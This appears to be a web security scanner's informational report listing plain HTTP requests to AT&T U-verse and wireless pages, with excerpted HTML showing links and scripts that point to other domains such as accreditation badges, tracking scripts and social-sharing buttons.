GET /u-verse/explore/advanced-features.jsp?wtSlotClick=1-004YH0-0-2 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /u-verse/explore/battery-backup.jsp?wtSlotClick=1-004YGE-0-4 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... nstalled and/or after a replacement battery is installed at normal indoor temperatures. For battery replacement and recycling information, please call Belkin at 866-539-5791, or visit their website at <a href="http://www.belkin.com/gatewaybattery" target="_blank">www.belkin.com/gatewaybattery</a> ...[SNIP]... <p>Information regarding where replacement batteries can be purchased is available at <a href="http://www.belkin.com/gatewaybattery" target="_blank">"Where can I purchase a new battery"</a> ...[SNIP]... <br /> <a href="http://www.belkin.com/gatewaybattery" target="_blank">www.belkin.com/gatewaybattery</a> ...[SNIP]... </b> <a href="http://www.belkin.com/gatewaybattery" target="_blank">www.belkin.com/gatewaybattery</a> ...[SNIP]... <p>For battery replacement and recycling information and to purchase replacement batteries, please call EnerSys at 1-866-327-5755 or visit the website <a href="http://www.fibersafebattery.com" target="_blank">www.fibersafebattery.com</a> ...[SNIP]... <p>Information regarding where replacement batteries can be purchased is available at <a href="http://www.belkin.com/gatewaybattery" target="_blank">"Where can I purchase a new battery"</a> ...[SNIP]... <p>Consumer batteries are only available for purchase from EnerSys at 1-866-327-5755 or <a href="http://www.fibersafebattery.com" target="_blank">www.fibersafebattery.com</a> ...[SNIP]... </b> <a href="http://www.fibersafebattery.com" target="_blank">www.fibersafebattery.com</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /u-verse/explore/default.jsp?wtSlotClick=1-005RAL-0-3 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T ...[SNIP]... <noscript><iframe src="http://view.atdmt.com/iaction/UverseExplore" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe> ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]... <link rel="canonical" href="http://www.att.com/u-verse/explore/default.jsp" />
<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script> ...[SNIP]... <map name="sharemap"> <area target="_blank" shape="rect" coords="0,61,39,80" href="http://www.twitter.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_twitter'});this.href=meteor.sharing.href('Twitter', {'title': 'I like AT&T U-verse TV! I get more HD channels than ever before and can record up to 4 shows at a time on 1 DVR.'});" /> <area target="_blank" shape="rect" coords="0,81,39,100" href="http://www.facebook.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_facebook'});this.href=meteor.sharing.href('Facebook', {'title': 'Looking for TV like you\'ve never seen before? Want more HD channels than most local cable providers currently offer? What about recording four shows at once on a single DVR and then playing back your show in any room in your home? AT&T U-verse(R) may be available in your area. Check it out!'});" /> <area target="_blank" shape="rect" coords="0,101,39,120" href="http://www.linkedin.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_linkedin'});this.href=meteor.sharing.href('Linkedin', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before! Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers. '});" /> <area target="_blank" shape="rect" coords="0,121,39,140" href="http://del.icio.us" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_delicious'});this.href=meteor.sharing.href('del.icio.us', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before!', 'desc': 'Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers.'});" /> <area target="_blank" shape="rect" coords="0,141,39,160" href="http://www.digg.com"onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_digg'});this.href=meteor.sharing.href('Digg', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before!', 'desc': 'Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers. '});" /> <area target="_blank" shape="rect" coords="0,161,39,193" href="mailto:" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_email'});this.href=m ...[SNIP]...
GET /u-verse/explore/home-alarm.jsp?wtSlotClick=1-0056MV-0-3 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /u-verse/explore/international-rates.jsp?wtSlotClick=1-004YH0-0-4 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /u-verse/explore/phone-landing.jsp?wtSlotClick=1-001SNC-0-1&WT.svl=calltoaction HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <div class="logoBlock"> <a href="http://www.ctia.org" target="_blank"><img src="/global/images/en/footer/CTIA.gif" alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org" title="The first nationwide carrier to be awa ...[SNIP]... </a>
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" ><img src="/global/images/en/footer/BBB.gif" border=0 alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB report."/></a> <a href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101" target="_blank"><img src="/global/images/en/footer/Truste.gif" alt="This site is certified by TRUSTe" title="This site is certified by TRUSTe" /></a> <a href="http://www.yellowpages.com" target="_blank"><img src="/global/images/en/footer/ypcom.gif" alt="YP.com - the new yellowpages.com" title="YP.com - the new yellowpages.com" /></a> <a href="http://www.realpageslive.com" target="_blank"><img src="/global/images/en/footer/DWYPgs.gif" alt="Digital White & Yellow Pages" title="Digital White & Yellow Pages" /> ...[SNIP]...
GET /u-verse/explore/safety-security.jsp?wtSlotClick=1-0068A4-0-3 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /u-verse/explore/storage-convenience.jsp?wtSlotClick=1-0068A4-0-2 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <div class="logoBlock"> <a href="http://www.ctia.org" target="_blank"><img src="/global/images/en/footer/CTIA.gif" alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org" title="The first nationwide carrier to be awa ...[SNIP]... </a>
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" ><img src="/global/images/en/footer/BBB.gif" border=0 alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB report."/></a> <a href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101" target="_blank"><img src="/global/images/en/footer/Truste.gif" alt="This site is certified by TRUSTe" title="This site is certified by TRUSTe" /></a> <a href="http://www.yellowpages.com" target="_blank"><img src="/global/images/en/footer/ypcom.gif" alt="YP.com - the new yellowpages.com" title="YP.com - the new yellowpages.com" /></a> <a href="http://www.realpageslive.com" target="_blank"><img src="/global/images/en/footer/DWYPgs.gif" alt="Digital White & Yellow Pages" title="Digital White & Yellow Pages" /> ...[SNIP]...
GET /u-verse/explore/uverse-difference.jsp?wtSlotClick=1-004YN5-0-2 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... </sup> Access includes AT&T Wi-Fi Basic. Wi-Fi enabled device required. Other restrictions apply. See <a href="http://www.attwifi.com/" target="_blank">www.attwifi.com</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
The response contains the following link to another domain:
http://view.atdmt.com/iaction/BundleBuilder
Request
GET /u-verse/shop/customize.jsp?wtSlotClick=1-004YH7-0-3 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /u-verse/shop/index.jsp?wtSlotClick=1-005RAL-0-4 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script> ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <map name="sharemap"> <area target="_blank" shape="rect" coords="0,61,39,80" href="http://www.twitter.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_twitter'});this.href=meteor.sharing.href('Twitter', {'title': 'I like AT&T U-verse TV! I get more HD channels than ever before and can record up to 4 shows at a time on 1 DVR.'});" /> <area target="_blank" shape="rect" coords="0,81,39,100" href="http://www.facebook.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_facebook'});this.href=meteor.sharing.href('Facebook', {'title': 'Looking for TV like you\'ve never seen before? Want more HD channels than most local cable providers currently offer? What about recording four shows at once on a single DVR and then playing back your show in any room in your home? AT&T U-verse(R) may be available in your area. Check it out!'});" /> <area target="_blank" shape="rect" coords="0,101,39,120" href="http://www.linkedin.com" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_linkedin'});this.href=meteor.sharing.href('Linkedin', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before! Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers. '});" /> <area target="_blank" shape="rect" coords="0,121,39,140" href="http://del.icio.us" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_delicious'});this.href=meteor.sharing.href('del.icio.us', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before!', 'desc': 'Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers.'});" /> <area target="_blank" shape="rect" coords="0,141,39,160" href="http://www.digg.com"onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_digg'});this.href=meteor.sharing.href('Digg', {'title': 'AT&T U-verse(R) is TV like you\'ve never seen before!', 'desc': 'Get more HD channels than most local cable providers currently offer with AT&T U-verse(R). Record up to four shows at once on a single DVR and play back your show in any room in your home. See if AT&T U-verse(R) is available in your area and take advantage of their special online-only offers. '});" /> <area target="_blank" shape="rect" coords="0,161,39,193" href="mailto:" onclick="meteor.tracking.track_conversion('49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3',{'name':'vertical_email'});this.href=m ...[SNIP]... <div style="float:left;width:300px;"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://bzzabout.it/71&layout=standard&show_faces=true&width=450&action=like&colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
GET /eos/unauth/eosLogin?wtSlotClick=1-006E1U-0-1& HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<!-- BEGIN : Global Main pa ...[SNIP]... </a> <a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" ><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/BBB.gif" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB ...[SNIP]...
GET /olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" target="_blank"> <img src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB ...[SNIP]...
GET /olam/loginAction.olamexecute?target=UpgradePH HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" target="_blank"> <img src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB re ...[SNIP]...
GET /olam/passthroughAction.myworld?actionType=Manage HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" target="_blank"> <img src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB re ...[SNIP]...
GET /cell-phone-service/cell-phones/cell-phones.jsp?wtSlotClick=1-005Y6F-0-1&feacondition=allphones&feaavailable=allphones&feafree=free&feapaytype=standard&startFilter=false&allTypes=on&allManus=on HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
GET /cell-phone-service/cell-phones/index.jsp?wtSlotClick=1-005Y6F-0-5 HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]... </script>
GET /cell-phone-service/cell-phones/pda-phones-smartphones.jsp?wtSlotClick=1-005Y6F-0-2 HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
GET /cell-phone-service/go-phones/index.jsp?wtSlotClick=1-005Y6F-0-3&bfdcode=ATT&source=EC44250000000040 HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script> ...[SNIP]... <p style="margin-top:0px;"><a href="https://www.myprepaidrefill.com/ATT/default.aspx?wtSlotClick=1-0014FG-0-1&WT.svl=calltoaction" onclick="" rel="nofollow"><img src="/global/images/btn_arrow_box_white.gif" style="vertical-align:text-top;margin-right:3px;" /></a><a href="https://www.myprepaidrefill.com/ATT/default.aspx?wtSlotClick=1-0014FG-0-1&WT.svl=calltoaction" onclick="" rel="nofollow">Add minutes now</a> ...[SNIP]... <li class="arrow-icon"><a href="https://www.selfincharge.com/webhsc/index.jsp?wtSlotClick=1-0050TO-0-1&WT.svl=calltoaction" onclick=" ; javascript:dotComPopUp(this.href,800,600);return false;">Pick Your Plan Log in</a> ...[SNIP]... <li class="arrow-icon"><a href="https://www.paygonline.com/websc/index.jsp?wtSlotClick=1-0050TO-0-2&WT.svl=calltoaction" onclick=" ; javascript:dotComPopUp(this.href,800,600);return false;">Pay As You Go Log in</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
GET /cell-phone-service/specials/netbooks.jsp?wtSlotClick=1-005Y6F-0-4 HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
